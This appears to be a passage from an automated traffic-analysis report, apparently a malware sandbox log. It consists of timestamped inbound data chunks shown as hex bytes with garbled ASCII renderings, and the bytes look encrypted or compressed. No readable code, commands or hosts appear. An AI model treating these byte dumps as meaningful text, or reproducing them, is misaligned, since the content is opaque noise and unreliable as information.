                                                                                                                                                2022-09-29 12:50:05 UTC12128INData Raw: 8d cf cf 31 13 c5 4c 27 c7 7a 8e 42 d3 96 5d a4 fd 88 9e 3c f7 dc 03 0d 79 bd 33 77 0f 81 f9 a0 1d 60 d4 8b 4b 47 d1 3a df 31 4b 8a a4 e5 bb 3e 1f 75 ed ab 3d 5e cf 7a d1 1e 28 de e5 e7 e6 fd 23 da 77 4b b1 4e 46 43 32 9f 11 23 09 77 8b 40 60 fb 85 f9 8c c5 a7 40 47 94 ab 96 ac e2 67 8c 7d a1 88 28 bc 4c 6e 98 58 15 af 63 29 8d cf ba 76 0f 59 c1 e3 cd 2a 73 42 6b fe bc ce 3d 3f 87 6e ed dc db 1e 5d 3d 04 19 c0 c5 c1 7c 95 36 6d b2 97 97 ac e5 fd f0 65 65 75 3e 9f e4 88 c9 60 61 4a 9a 5c d2 95 57 6e f7 71 87 f0 fd 9c 2d a6 a6 9a bf 30 3c 2d bb 70 48 07 a6 f5 e9 87 41 90 a8 df 24 e0 b2 dd dc 57 91 b2 ec ad 35 78 f0 f7 ae d8 82 9b c3 38 52 e7 ec 06 0a 55 2b 71 6f 62 84 1f ec 52 6f 91 8f 00 31 3a 35 a4 05 2f 9b 1a 68 60 d7 63 5c 27 21 19 dc e5 b5 28 c6 46 3d
                                                                                                                                                Data Ascii: 1L'zB]<y3w`KG:1K>u=^z(#wKNFC2#w@`@Gg}(LnXc)vY*sBk=?n]=|6meeu>`aJ\Wnq-0<-pHA$W5x8RU+qobRo1:5/h`c\'!(F=
                                                                                                                                                2022-09-29 12:50:05 UTC12144INData Raw: 96 89 1a 7c 41 a1 42 b8 9d 78 41 b2 a9 9c 98 c0 ac 42 32 19 e3 34 a5 6a f4 8b 44 d9 fd d2 6e b7 1a 94 a5 c7 23 6b 8b ef 48 13 fd d6 31 69 63 f2 30 46 2d 66 11 61 52 75 07 eb aa b0 0e 55 d0 46 d4 b1 bd 6d fb 55 c5 37 9b b8 b4 21 42 6b 94 3d f1 1a d7 75 46 a4 4f 95 3c c5 7a 79 87 51 64 a5 da 71 61 92 1d e3 4b 40 55 48 0d bd 45 b0 5e f3 d1 55 6f 4b 18 c5 fa 74 b6 76 9d 8d 25 fa 9e e8 36 61 44 c0 d3 9b c7 36 44 d8 6e 00 eb f3 7f 3f 17 e1 e5 d6 e8 19 ea 87 a5 c9 ab fa d3 dc 68 00 e8 df c6 c1 2d 00 00 f9 cf 76 a8 3c 85 79 6c 8b 09 6f c2 00 c0 d2 5a ec 33 24 36 49 68 d7 3a 26 a0 30 0d 5f 1b 77 f7 9e aa 13 8f 59 8a 15 a4 df ac 24 e0 e6 fb 3d 78 7c 97 e9 5b a8 9f 1a f3 81 93 71 77 98 72 74 44 11 ce 65 ed a0 0e 56 35 8c 2b c2 e8 94 f7 c1 af fa 32 48 f9 f1 71 1c fd
                                                                                                                                                Data Ascii: |ABxAB24jDn#kH1ic0F-faRuUFmU7!Bk=uFO<zyQdqaK@UHE^UoKtv%6aD6Dn?h-v<yloZ3$6Ih:&0_wY$=x|[qwrtDeV5+2Hq
                                                                                                                                                2022-09-29 12:50:05 UTC12160INData Raw: 93 a6 fe 60 e3 53 07 56 4c 54 b5 cf 2e 75 20 8f 74 e5 67 30 93 f1 87 03 b4 5c 5e b2 38 cc 09 f9 51 bb 80 a6 84 9a 6d 67 11 0b 49 0d b8 2e 84 e3 04 2e 32 ca a5 91 20 e9 36 c5 01 19 51 80 1f 31 4c 89 88 f0 1d a7 35 2e d6 91 a7 ae 27 71 dc 37 e7 96 b1 14 db 3c 0e 45 1b 9b a8 48 46 5d a5 fb dd 29 38 e9 bf 98 a4 61 9b fb 32 20 27 09 72 87 0c f4 e2 68 0d 63 3a d8 ac 20 70 a2 cf c7 6f e8 6b 8e ae 09 b8 a3 73 0a 3e 8e 36 db 6d ce 64 8e d9 c9 5e e9 ab 08 73 2c 73 ee fd 70 23 37 7e 5f b0 79 45 6b 08 24 4f 67 20 8c d8 19 58 8f 10 08 3b 28 4a e3 0c 9d af 3d 29 e1 7e 83 6a 18 52 fc ee 79 23 c3 62 1d de 7d 52 7f 98 85 3c 56 6e d0 6b 61 68 29 39 bc 9c 3e 2d 37 29 b7 18 bb c8 05 32 d8 e8 03 5e 13 a8 7b a5 fb da dc 17 9c 7d 72 1f 79 ff a0 0c 91 2d 11 89 9d 0a d5 d5 dc 58
                                                                                                                                                Data Ascii: `SVLT.u tg0\^8QmgI..2 6Q1L5.'q7<EHF])8a2 'rhc: poks>6md^s,sp#7~_yEk$Og X;(J=)~jRy#b}R<Vnkah)9>-7)2^{}ry-X
                                                                                                                                                2022-09-29 12:50:05 UTC12176INData Raw: 58 d9 d7 5d be b5 a6 38 b1 35 69 a4 c7 99 7e a7 64 ff e2 7c 44 2f dd 7b f0 85 e8 b1 22 00 a4 a0 fb b0 ef d4 8c f9 7c 18 0c 4c 7e 9c 53 42 dd 42 59 e9 63 61 c0 80 43 e2 0e 33 7a 3a 15 ca 16 a3 a6 4d 4b 71 c8 79 3a 72 fc 39 10 c3 69 d2 cc 6f 44 48 7f 1a 22 02 4c e7 23 6e 27 84 d5 00 b2 26 d5 a9 bf 5e e9 1c 88 25 99 d3 ec e3 41 c8 1d f7 99 49 60 2d b9 fd 70 d2 59 04 ad d2 5e 3b 57 a4 65 1c 8d de 0d bd 3c e4 0b 21 d4 37 57 08 9d c4 be 10 9f 6f 4d 7a 91 42 77 54 a8 d8 25 6b 08 f2 a8 99 9f 80 28 61 5e ec f7 c1 8e 89 39 1a 61 5c b6 54 72 c1 a4 f1 20 d1 6e d1 db d8 96 42 ec a2 d0 43 0d 50 eb cd e0 b0 6b 2c 5a a2 ff cf 10 b4 a9 92 f5 22 bc e0 8b 1a 49 79 52 3b c4 f3 c5 6c 74 b3 1f 64 71 60 87 69 53 b6 0f 58 7a bf 8a 60 d6 1b c0 12 93 76 ff d8 aa 2f 7c 6f da f4 7b
                                                                                                                                                Data Ascii: X]85i~d|D/{"|L~SBBYcaC3z:MKqy:r9ioDH"L#n'&^%AI`-pY^;We<!7WoMzBwT%k(a^9a\Tr nBCPk,Z"IyR;ltdq`iSXz`v/|o{
                                                                                                                                                2022-09-29 12:50:05 UTC12192INData Raw: d6 48 5b 90 06 c5 e5 83 e8 d1 40 e1 69 22 cd c8 30 7b a8 cf 82 85 1e 1e b6 c3 38 89 37 6e 58 a3 15 36 aa e0 c2 b9 c5 5b 48 b0 67 ef 9f 90 3f 7e 6c 6a 72 c0 08 c5 5d a1 38 28 b8 eb 84 34 a8 8e b8 66 9d ae 84 4f 5e 76 7d 1d 81 64 4e cc c7 b6 12 f4 d5 f7 06 06 c1 9b 5f bf 37 ba fa a8 e3 71 ac a3 8d f2 8f 37 ce 26 f1 cd 82 96 27 b0 b9 55 67 86 62 c9 12 8c c8 03 99 6b a6 b1 35 9c 43 8b 27 fa 1b 58 25 8b 31 af ce 9b c2 a4 2c eb fc 60 0c ac 3c ab d0 b3 45 33 da 5e 80 76 20 dc ef 8d 6a ac 8e ba 0b 9e c1 b7 0f 6e 95 7d 38 21 fb fb 78 68 2d 34 2f 31 54 c9 58 94 e1 e2 b4 68 3b db ff 74 27 4b f8 80 f7 b5 9a 22 c7 c1 07 72 8c 21 1f a3 2f ee 9c 7a 43 df dd 52 04 1a 5a 41 bb 7e 1e 0f 26 98 40 e8 f3 92 9d 98 c2 aa ff 7b 95 6e 38 0e 87 e2 56 2b 92 ad d0 d1 94 80 a4 86 12
                                                                                                                                                Data Ascii: H[@i"0{87nX6[Hg?~ljr]8(4fO^v}dN_7q7&'Ugbk5C'X%1,`<E3^v jn}8!xh-4/1TXh;t'K"r!/zCRZA~&@{n8V+
                                                                                                                                                2022-09-29 12:50:05 UTC12208INData Raw: 0e 74 dd e9 49 04 d7 fa c2 a1 35 29 fe 61 4f 5d a1 41 d0 9a 08 27 c8 27 4d 7d 02 4f d5 d7 f9 b6 78 39 b5 bd 88 01 87 35 5e 62 13 f8 fc 22 c6 43 f0 c3 ee 8e 14 0c ca c5 ab a0 65 29 f4 12 f4 4a 04 e4 99 27 30 93 7e ff 96 0b c9 18 78 6b 22 09 b2 11 4a 1c 76 23 eb 45 f9 50 95 22 9c 6b 6c 34 31 1c 8f aa 12 5d f6 23 02 44 a3 30 4d a7 ec 44 f9 52 de 82 dd f2 67 9e e0 0b cf bc cf 25 c6 8d 76 ab 94 d3 77 f3 f3 47 6b 2d 01 76 c8 60 bf da 0d f5 d4 01 33 7a 32 d7 26 f7 3e 64 32 13 51 90 69 d1 9e d3 f7 32 c9 e0 72 cf f3 a8 c9 6a d9 4e 74 a6 33 08 c4 a3 d0 bb 24 e4 f8 5b 21 0d 4b 8d 9b 83 3a b9 1b dc e2 eb 17 01 fa ee ca 65 3c a8 18 bd f6 3c 4e d5 90 4f 3a c3 b9 fe 30 89 a8 0e 00 95 ad d5 12 01 06 5c 6f e1 64 f7 d0 12 d2 24 12 57 b2 16 08 79 a9 d4 eb 10 77 f1 d1 a0 a3
                                                                                                                                                Data Ascii: tI5)aO]A''M}Ox95^b"Ce)J'0~xk"Jv#EP"kl41]#D0MDRg%vwGk-v`3z2&>d2Qi2rjNt3$[!K:e<<NO:0\od$Wyw
                                                                                                                                                2022-09-29 12:50:05 UTC12224INData Raw: ca 49 30 c2 8c 27 f6 68 56 e7 68 b6 c8 66 ca 64 65 b8 98 3a 6b 2d c8 bc d7 be 1d 94 03 83 9d dc eb 39 87 1c a0 54 32 d2 f7 28 c6 25 12 bc 9b 5c 28 85 f6 c6 b8 61 ae f1 3e f1 e0 af 77 4e 8c 09 be de 3e 95 d1 e6 3d 5e 21 f9 d9 ff 71 df 4c 91 79 6f d8 0d 85 ed ab 05 49 04 37 6e 8d 02 15 a2 43 64 34 dc 66 78 85 0c 82 4c 42 7b 3e 1a cd 98 a6 3a 9a 9c 52 ee fe de 6c bc 29 3f 10 76 97 47 68 d0 14 0c 28 fd 9a db e5 94 60 77 21 14 f3 e6 2a 0a 7c 96 c4 81 20 55 0f ec 3b 1a 21 b2 06 29 00 a0 17 f8 90 de de 71 08 49 0e 45 98 04 e5 98 1c 71 56 45 8d 62 bf f6 73 b5 3c 6e 0e 05 9f 34 19 8d a2 59 5a 48 86 41 c7 41 71 af 92 59 c4 ac f3 95 b6 a0 a1 02 cf fb ec f5 54 0a 23 e1 b2 58 4d 30 49 b3 d6 98 9a 90 53 08 b2 1a 9d 1b f2 91 0d da 37 ea 5d c0 0e c1 ff 1f ac 8a cb 32 6b
                                                                                                                                                Data Ascii: I0'hVhfde:k-9T2(%\(a>wN>=^!qLyoI7nCd4fxLB{>:Rl)?vGh(`w!*| U;!)qIEqVEbs<n4YZHAAqYT#XM0IS7]2k
                                                                                                                                                2022-09-29 12:50:05 UTC12240INData Raw: 53 85 0b 75 13 27 06 64 df 13 58 0a fc 1f 8a 4a 61 4f 47 c2 02 70 cd 17 2e 40 ae ce 99 93 cf 1c c4 17 8d 85 aa a0 b4 a0 34 e6 f6 c1 02 04 61 de 4a 5e 20 c1 e2 05 07 c9 ba 8d bc 80 06 ec 3f b3 97 46 a3 44 4e 49 e7 5e c6 ff 92 f7 27 99 e6 20 56 16 14 75 f9 fa fa e5 45 07 5f eb f3 91 77 e9 e9 0c 09 cb ba 23 e2 78 be 7d 01 07 0b 48 44 54 84 65 56 b3 a3 06 6d 95 57 8f 16 69 e9 4e eb f4 56 ee 02 02 69 f3 3e 16 aa 89 65 e3 33 65 3e 11 a2 c9 7d 8e 76 16 09 c8 50 b1 89 59 cf b2 2e bd 83 6f 04 4e ff 41 a6 4b 67 5c 2e b7 c9 83 7d e8 2c 03 1d 1a b1 f5 80 41 5e a7 bf 3c ed 48 bf 09 e6 7f 65 b7 f8 3e aa 89 e7 6b 48 66 1e 80 63 b1 22 f4 17 15 39 b7 8b 1b 86 5d 45 3e 2b 0d f1 ee 45 31 92 ab ba 48 36 0a 2e ec 3e 8d 05 94 cb ec ca c5 8a 66 bf dc 7d 35 a5 d7 06 06 3d 19 70
                                                                                                                                                Data Ascii: Su'dXJaOGp.@4aJ^ ?FDNI^' VuE_w#x}HDTeVmWiNVi>e3e>}vPY.oNAKg\.},A^<He>kHfc"9]E>+E1H6.>f}5=p
                                                                                                                                                2022-09-29 12:50:05 UTC12256INData Raw: f7 e8 67 a9 76 d6 34 6f a4 3a 41 12 f8 c1 9d d6 14 9f 02 82 74 85 a5 e2 44 d4 77 dc 39 11 c1 64 78 be 1e 6f a0 f0 24 d9 f8 e5 c3 ce a6 a6 41 a5 28 d0 ef d7 8b ed 88 20 d0 13 f3 f2 0d 1f 48 08 bd 7e 37 c8 28 7b 26 ec db 1e 75 76 67 11 61 05 79 c3 71 b7 a3 8c 42 3a e6 74 4f 51 a4 49 27 27 53 55 8f 9a 6b bf 13 8f 1c 61 14 52 ac f6 b1 ca d2 0b ea d3 6b d0 c4 98 a6 f4 7d 77 c4 19 5a 5a cb 26 fc 4c f3 30 b2 83 fc 84 0e 0a 6a 8b ae 3f ae 42 d2 f6 eb 4b f3 2c 93 3d fc 70 ec bf 60 58 76 7d 0a 90 b5 70 fc 57 c3 42 e2 e0 ca f3 cd 84 a7 d0 d3 e2 c9 9d 1a 75 11 cd b1 7a a2 24 1c a2 fa 43 4e 73 11 5f 0d 4f e9 20 b0 34 33 6a 32 12 d6 d6 36 66 8c e8 c7 2b b5 31 0a 25 1a f0 6a bd d0 0a 8a 6a 17 a1 ef ba 63 fb c7 0b e3 aa 11 56 85 06 41 a7 a8 d7 65 1f 26 0f 9e 88 8e a5 05
                                                                                                                                                Data Ascii: gv4o:AtDw9dxo$A( H~7({&uvgayqB:tOQI''SUkaRk}wZZ&L0j?BK,=p`Xv}pWBuz$CNs_O 43j26f+1%jjcVAe&
                                                                                                                                                2022-09-29 12:50:05 UTC12266INData Raw: a1 82 d6 54 42 80 50 40 39 8e 75 ae ab d9 93 d5 05 a1 85 cf 9b 3f 18 47 f1 73 42 76 28 df 15 5a 5d a4 68 1a cf 2c 0c 4f f5 53 25 1f b2 43 45 98 f3 db 26 c0 e9 bf 03 82 fb 15 fd 35 12 66 06 f1 54 79 e0 15 e6 62 22 c3 59 77 a7 ab f0 30 cd 42 8a e7 e4 76 fb a7 37 ba f1 8c 11 4b 82 cd 75 1a 17 9d 96 fe a7 86 ae fd 6e f6 66 47 04 6f b4 05 d3 75 ec ef 22 93 09 18 5e 03 c7 25 cc e5 e0 66 12 d3 48 43 c1 0c dc 1e 36 2f bc 6f e3 51 72 7e 5a 1f 1e 35 09 fb 92 bd f6 dd 25 94 f4 55 d6 cf 4b 05 c1 2c f0 67 59 3a 15 69 10 fa ee 64 2e 5e 89 6b b7 01 cb b2 df d6 0c 52 b7 70 a6 c5 ee 7a 62 f7 6e 11 35 54 bd 73 52 53 28 a8 4e ec 52 52 00 50 ec 15 af 5c 3c 55 f4 6d 58 a5 42 de 78 1d 42 c0 8d ae 02 de 4e 72 0c ac 69 fa 99 a5 d2 2a 0e 70 54 01 a8 bc cf 4e 57 c6 72 74 86 a8 2d
                                                                                                                                                Data Ascii: TBP@9u?GsBv(Z]h,OS%CE&5fTyb"Yw0Bv7KunfGou"^%fHC6/oQr~Z5%UK,gY:id.^kRpzbn5TsRS(NRRP\<UmXBxBNri*pTNWrt-
                                                                                                                                                2022-09-29 12:50:05 UTC12282INData Raw: 16 cf 52 fd 2e 8b ba 3b ca 7c f9 41 9f 0c 57 13 b5 e6 49 9c 4b 13 7d 50 49 d9 60 8e de fb 55 42 e5 26 8f 6d 7a db 62 27 cd b6 28 66 ca d5 78 d3 15 22 55 00 b4 34 9f c3 c5 c5 46 ed 72 68 fc 7b 32 ad 1c a0 c7 c7 ed 03 44 13 ba cb 71 e0 43 0b 42 d1 39 40 d1 9b 04 98 e8 fe cf 65 b3 ed e4 ad d3 49 89 49 5f de 17 4a 42 7d 70 0d 6d 1b 1a 24 88 f5 d1 f5 94 f4 d9 38 75 6c 0b e8 16 e3 71 ce be cd 84 e5 0a 77 f5 f5 80 3e c4 83 58 b8 da 84 46 f5 d9 2c 78 ed 6c dd 15 56 24 81 cb 71 5f 46 37 09 16 2c ae 99 05 d2 2d cf 99 d9 be 59 8a 0d ba 3a 8a 94 b9 18 30 6b 0b 7c a0 74 c2 79 6a 5f 50 90 a2 5f c8 5d 71 85 d4 1b ac 97 ef e8 ba 20 e7 ec 7f 50 5e 64 5e c8 e9 57 3a c4 ff a1 48 d8 3c 68 4a 83 4b fc 8d 59 3b 44 2a cf ef 36 12 cc a9 16 9f 11 e0 57 5d 0b 9e c2 2c e9 98 f1 ac
                                                                                                                                                Data Ascii: R.;|AWIK}PI`UB&mzb'(fx"U4Frh{2DqCB9@eII_JB}pm$8ulqw>XF,xlV$q_F7,-Y:0k|tyj_P_]q P^d^W:H<hJKY;D*6W],
                                                                                                                                                2022-09-29 12:50:05 UTC12298INData Raw: 48 9e c7 20 db 14 ee 03 3f c9 f9 79 5a 71 4f 32 b7 b6 63 bf 48 9e 83 6b d3 f3 60 1c 5c 09 b2 30 ef 91 20 32 81 f3 61 4d 96 08 72 9c aa 80 8a 07 2f e5 fc 36 d0 72 46 ae 4c 9c 7b 19 f9 85 0b 0c 4d 74 28 a7 f9 ff 7c b4 7a 9e 5b 2b cd 9d d5 8e 90 e6 1d c9 e9 eb a5 12 f9 60 a0 34 be fc 8f 57 21 88 72 5c e4 8e fe a3 6f c4 b3 7b 3b 62 93 9a 01 6b f0 3d 98 7a ec 59 c0 f9 16 ab 60 01 0c 9c 03 f0 da bc 68 5c 06 18 b2 b0 06 57 c2 b2 89 51 47 29 21 b5 df 4b 1c 32 fe d9 5e 42 c0 29 0c bf a5 f2 15 36 6e 07 c5 75 ed fc e9 ca eb 0e 5e cd 5a 35 e3 f4 62 33 11 56 a3 00 b4 6a 84 e1 3d 2f 56 dd 30 a8 62 ef 58 70 11 e0 b8 e4 49 bc d7 88 74 74 a5 5e e5 98 04 a2 af c2 f9 62 c0 2c 4e a1 f2 14 bd 12 ed 3e af bc 97 3e aa 82 72 0d 97 81 d7 b6 b0 c4 12 24 4d 24 02 75 d6 a7 02 d0 65
                                                                                                                                                Data Ascii: H ?yZqO2cHk`\0 2aMr/6rFL{Mt(|z[+`4W!r\o{;bk=zY`h\WQG)!K2^B)6nu^Z5b3Vj=/V0bXpItt^b,N>>r$M$ue
                                                                                                                                                2022-09-29 12:50:05 UTC12314INData Raw: c1 55 f5 1d 28 77 af 6a ae 53 5b dc 88 3e d5 d8 61 0c 76 02 37 db 29 37 46 18 9a e8 57 0f 06 58 7f fe b4 be a3 2d 20 e8 fa 29 87 6c 7b 4c 0f 0f c1 f7 9b 6d 5f e5 0c 41 d2 e4 ba 0c f6 ab dc a2 9d 83 ea 5a 6f 89 61 43 81 9d 4a 05 93 4d 10 81 a0 93 b9 6d ba 48 95 e6 11 2e 02 a6 a4 e9 f8 32 f5 e7 b7 13 bc 5c 73 4d 95 98 c3 4d df 48 b2 d6 35 98 cb 57 2f 83 16 97 d7 85 17 0f ed 13 d7 a9 30 d1 eb cd ee 10 b0 7b 1c d6 1e c0 69 b6 e3 89 8f 4e 94 41 7f c3 0c 61 66 26 12 89 64 2e 45 c2 62 f7 5d 6a 38 46 c9 24 4f 1e fc 1e a9 d6 00 a2 b1 be 85 4a 6c dc f5 09 b6 19 95 e1 8d 59 9d 4b bf ba e3 9e b5 14 38 9a e2 b3 90 9e d7 8e 19 64 8b c6 23 eb a4 25 d0 4a 05 ad 77 8c ed e1 2e 6e 46 71 0f 9e a3 33 fc f6 5e bb 41 3a bc 4c 16 74 4d 7e 55 fb 13 fc ca d7 f6 c5 30 61 f9 2f 14
                                                                                                                                                Data Ascii: U(wjS[>av7)7FWX- )l{Lm_AZoaCJMmH.2\sMMH5W/0{iNAaf&d.Eb]j8F$OJlYK8d#%Jw.nFq3^A:LtM~U0a/
                                                                                                                                                2022-09-29 12:50:05 UTC12330INData Raw: 4d 11 b5 c7 6a a7 14 95 8c ce cd eb 76 82 5b 56 59 7f d3 4a 49 62 cb f3 65 54 39 4a 0c d4 df 02 5f a1 a6 c2 dd 14 5a 24 fc 72 52 31 31 c2 3c 12 8e 1b 26 3e f8 36 e4 61 c1 aa e0 c4 9e d1 88 58 41 fd 27 c7 61 a3 e3 7c be b1 e2 ee 49 cb 36 3d 2d d1 5c d9 78 be 36 3f 6d 36 08 cd 1c fe 7b 4b 7b 80 61 a5 ed 8c c4 61 fb d5 ab 51 52 7b 05 30 52 ba 56 82 fc 1d f7 95 63 41 22 bd fc 9e 70 2b 5b 93 b8 b2 6d 98 9f 84 73 52 79 5b 1a 94 08 f0 2c 27 09 2a a6 12 44 29 45 90 83 bd 15 09 d9 29 35 54 9b 00 a6 3d 24 5e ca 15 91 42 06 07 02 f0 43 22 da 2f 54 1c 1e 6d 9c db e4 38 5e 6f f5 c4 38 af ee 72 5b 29 23 d3 23 ee 66 6e 08 1b 45 32 9c d8 da f7 c8 9c 5d 8f 05 a7 f4 24 ae a9 25 e6 04 ad ee f1 ad 6e 47 fa e3 9d cd 0e f6 7f cc 64 42 b7 ea 04 5a fb b1 71 ae 63 70 18 a7 17 b5
                                                                                                                                                Data Ascii: Mjv[VYJIbeT9J_Z$rR11<&>6aXA'a|I6=-\x6?m6{K{aaQR{0RVcA"p+[msRy[,'*D)E)5T=$^BC"/Tm8^o8r[)##fnE2]$%nGdBZqcp
                                                                                                                                                2022-09-29 12:50:05 UTC12346INData Raw: 4e 9c 29 4d 9c 18 eb 76 af 81 57 41 2e 53 49 9a 53 e4 f0 50 f3 8c 28 04 ca b0 5f 94 11 24 ee 27 c5 43 89 05 18 6c e6 84 ef 8e 38 87 2c 09 8d 3c 01 54 36 23 54 6c 71 59 0c 60 c9 43 f2 5c 93 d4 e5 7a 83 dd fe 51 d8 69 d9 88 54 24 1e 89 bb e7 32 ac 39 bf 46 e1 45 b0 12 66 2f 15 ab a3 24 f9 f5 dc 25 9f 45 b6 44 7f f0 3a 3c e4 0f b6 8a 8a 5f 6d 11 17 c9 b1 5e 77 ca 1a 0d cc 81 e6 e8 2e 97 4e 5e 19 21 a6 03 d7 a6 82 7e 42 b9 cb ac 73 be bb 78 44 97 93 44 5d ed 71 11 a1 1d ae 23 c1 cc a3 22 98 09 22 a0 5d ad d0 20 d2 b4 6e 4c b8 0f 1f ee 7b 9b 02 23 80 4a b2 28 a3 60 7e 5f 42 73 c5 69 7c 69 f6 96 e5 39 dd 20 a5 17 03 81 14 aa bf 50 f5 61 d8 72 f2 d6 33 8f 99 74 34 f4 b8 9a 46 ee 21 55 de 97 24 e8 e7 9c f6 52 d0 58 57 c9 55 e5 2e 7b 2c fc 8a be b5 75 6a 21 d2 c2
                                                                                                                                                Data Ascii: N)MvWA.SISP(_$'Cl8,<T6#TlqY`C\zQiT$29FEf/$%ED:<_m^w.N^!~BsxDD]q#""] nL{#J(`~_Bsi|i9 Par3t4F!U$RXWU.{,uj!
                                                                                                                                                2022-09-29 12:50:05 UTC12362INData Raw: ac ba a3 37 a7 02 85 eb 24 2b b8 8d 2b 5f 1c 8f be 72 fb 24 3e 48 5c 7d 84 ae b8 3e 90 7b ca ca 57 a8 32 5c 3d 7c 6f 7a e2 e1 d7 ee 8f 71 b6 c1 b2 29 65 d6 60 66 ca ff 53 30 05 f0 cd 24 62 93 5d 26 e3 cb a8 c2 71 8d 33 e8 6e 76 88 f4 03 3d 83 89 67 8f c5 2d 75 cc 57 be 30 4b 67 62 e1 55 db 17 4b 8e c0 81 29 c6 e4 3b 4e ba 2a 27 6c 75 df 47 87 91 c0 44 d6 18 c8 50 6a 90 20 46 47 51 ee b4 5e 21 1e 28 83 b3 f7 a8 25 90 7d e4 4d f8 bc 40 6f e6 fb 30 50 65 a5 b5 00 47 93 8f ff 50 25 36 46 be 76 1e 00 8a 3e 8c ac a7 e0 c5 10 b7 6e 7b e2 17 8a ee 09 0b 2d 7d 91 bc 44 65 32 db 85 1d 3a 5e eb 44 92 2e 7e d0 b4 8a 39 46 14 60 e2 1c 69 27 e7 63 f9 d5 43 8c 71 d3 fa dd dc b1 46 d9 55 a9 70 82 20 37 b3 29 9d 38 d9 cc b7 0d 9a 8d e4 8e e7 7a f2 32 9d a4 10 1e 58 5e 12
                                                                                                                                                Data Ascii: 7$++_r$>H\}>{W2\=|ozq)e`fS0$b]&q3nv=g-uW0KgbUK);N*'luGDPj FGQ^!(%}M@o0PeGP%6Fv>n{-}De2:^D.~9F`i'cCqFUp 7)8z2X^
                                                                                                                                                2022-09-29 12:50:05 UTC12378INData Raw: ca 37 bb 31 ae a8 92 ba 28 22 63 44 45 2f 36 a9 dd e3 85 1c b6 f9 db 45 e4 d1 b2 24 88 3b d3 f1 27 f8 b7 ad 33 97 dc 54 7e 2a 2c 7e 20 25 20 d8 67 18 fc ae a1 e8 b7 e9 e9 a0 34 50 3c 75 f5 b9 0b a0 86 49 fd fe 28 83 cd 3c 1f 06 62 f9 ca e9 20 74 5f 99 a7 d1 9f 56 c1 97 2d d3 71 9c 4f ce f5 d4 35 01 79 9c 7b 7a 57 e0 d2 be 6b e7 18 6e e9 9d 54 8a 48 9f c0 d4 dd b5 a9 6f 45 29 84 4f 6c 34 45 03 30 2c 03 fb bf 90 3e bb ba 3e b6 76 7b ec 2e 1f 9b f4 4f 80 ac ad 07 8d 55 53 31 d5 03 74 0c eb ce c3 58 e2 e8 42 75 9c 41 d9 1e bb 70 17 09 42 51 23 44 99 19 47 2f 95 ba 62 29 f1 62 4a d3 b3 22 c8 10 f9 b0 52 ea 0c 31 52 6d 1b 60 c9 fc 9e ca 44 92 24 8e eb 14 77 f7 13 6a 21 59 6b 0a 79 a5 3b 0c 76 bd 05 3b a2 0f ba df f3 93 9c 9f 81 f2 09 49 7f 8b e3 9d 84 33 82 b7
                                                                                                                                                Data Ascii: 71("cDE/6E$;'3T~*,~ % g4P<uI(<b t_V-qO5y{zWknTHoE)Ol4E0,>>v{.OUS1tXBuApBQ#DG/b)bJ"R1Rm`D$wj!Yky;v;I3
                                                                                                                                                2022-09-29 12:50:05 UTC12394INData Raw: 78 24 3d bb f6 80 48 6e 17 db 91 fe 84 d6 f0 ce 70 86 04 a7 86 c9 74 5b 37 63 8d ef 41 4b 4f e8 e6 82 18 1c 47 f7 ee f4 ed 43 f4 cb 84 e8 08 2b 2a 2d 31 28 4e 41 f8 76 1b 3b fd 6c cf cf 47 a1 c9 c0 e9 83 ca 31 78 e6 ba ca 16 58 aa 6a 8a 77 ae 53 d3 59 69 81 11 91 00 b1 23 5d 3a 7f b2 c2 78 98 ae d4 7a 6c 30 93 14 ce 19 78 57 37 ed 4f fa 9f f6 6a e8 88 c1 6b e2 db 50 00 a8 19 f8 94 5d e6 33 80 ba c2 70 33 07 6e 08 c6 6b 1d 44 45 ee b3 59 27 8b 68 3f a7 18 c5 47 49 2b 8f 2d c6 7c 1b 3b e0 f3 cd d5 9e f4 ae b3 b0 34 dc a9 04 35 d9 7f 0b 3c 48 86 11 8f f5 78 71 d1 2b b8 04 e7 5f 47 ea 53 8d 7f 64 4b 82 4d c8 78 bd b3 24 93 b0 11 5d bd 65 73 4f dc cd a4 82 6e 88 a9 b7 ae 7c 97 31 bf bd 5b 25 5a 7b 4a a4 90 e4 7a 32 65 d1 01 09 e1 75 1b 76 94 17 92 0e 99 63 c6
                                                                                                                                                Data Ascii: x$=Hnpt[7cAKOGC+*-1(NAv;lG1xXjwSYi#]:xzl0xW7OjkP]3p3nkDEY'h?GI+-|;45<Hxq+_GSdKMx$]esOn|1[%Z{Jz2euvc
                                                                                                                                                2022-09-29 12:50:05 UTC12410INData Raw: 36 bc d5 fd 63 6a 73 ee 92 ad 4c f3 77 2c b3 0a 22 84 cc ab bf ca d9 57 66 30 c2 fa 78 9a 38 e9 45 35 6c e0 30 06 c9 ae 42 8e 87 8e bd 35 d7 e5 37 83 69 14 23 c3 6f 22 f0 a1 8e 50 fc 3e 0d 91 90 e7 3b 1b c9 cc e7 b2 8a 3f d5 73 a2 5f 93 8d fd 49 d2 9f 8e cb 3f 97 40 a8 9e 38 c9 73 ab a7 b5 2c bb 25 bf 16 f3 d0 30 fe 60 c0 1d 70 c6 01 64 b6 07 65 9c f2 4b 01 17 5c 48 3c f0 1a 99 de 6c 3d 28 1b d6 59 07 7e 57 e6 db 97 c2 0f 1e 69 0d 03 a8 08 4d 6c 02 75 37 67 4a 99 b9 a1 98 4f 43 b6 c2 d2 08 6d 4d 9c 58 0a 22 57 74 e8 f1 4a b9 53 8d 9b 4b 2c 48 ab 39 eb 74 3f 5c ef ad 1b 38 a8 80 a3 c8 c5 95 48 dc 57 c6 72 4c d1 4a 1d 20 55 8e 6c c4 ff 9e 4d 63 b2 97 89 c5 92 51 8a c2 64 9e 16 61 57 4a eb a9 6a 06 e3 dc 3e af 62 33 42 de b2 23 69 19 de 91 fa 48 95 b8 00 75
                                                                                                                                                Data Ascii: 6cjsLw,"Wf0x8E5l0B57i#o"P>;?s_I?@8s,%0`pdeK\H<l=(Y~WiMlu7gJOCmMX"WtJSK,H9t?\8HWrLJ UlMcQdaWJj>b3B#iHu
